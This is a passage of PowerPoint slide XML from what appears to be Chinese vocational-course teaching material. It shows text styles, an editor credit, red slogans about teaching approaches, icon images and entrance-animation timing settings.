                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
